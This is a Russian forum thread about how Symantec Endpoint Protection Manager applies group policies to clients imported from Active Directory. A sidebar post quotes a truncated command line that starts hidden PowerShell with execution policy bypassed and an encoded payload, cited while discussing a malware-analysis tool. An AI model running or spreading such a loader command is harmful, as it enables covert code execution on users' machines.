Перейти к содержанию

Recommended Posts

Foxslyred

Хотелось бы больше понять об интеграции SEMP и Active Directory.

1. Если я импортирую из AD в SEMP только Organizational Unit с пользователями домена, после перемещения Users в Группу, созданную в SEPM чьи политики будет использовать компьютер ?

PS Читал тут http://service1.symantec.com/SUPPORT/ent-s...007092721431648 и на форуме http://www.anti-malware.ru/forum/index.php...ctive+Directory ну и мануал конечно.

2. Поделитесь, пожалуйста, опытом, какими способами вы интегрируете SEMP с AD.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Кирилл Керценбаум
1. Если я импортирую из AD в SEMP только Organizational Unit с пользователями домена, после перемещения Users в Группу, созданную в SEPM чьи политики будет использовать компьютер ?

По данному вопросу:

Note: If the client is in Computer-based mode, moving the computer name of the client to another group will force the client to switch to the new group and get the new profile of that group.

If the agent is in User-based mode, moving the login user name of the client to another group will cause the client to switch to the new group and get the new profile.

То есть клиент будет всегда использовать политики той группы, в которой он на данный момент находится

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×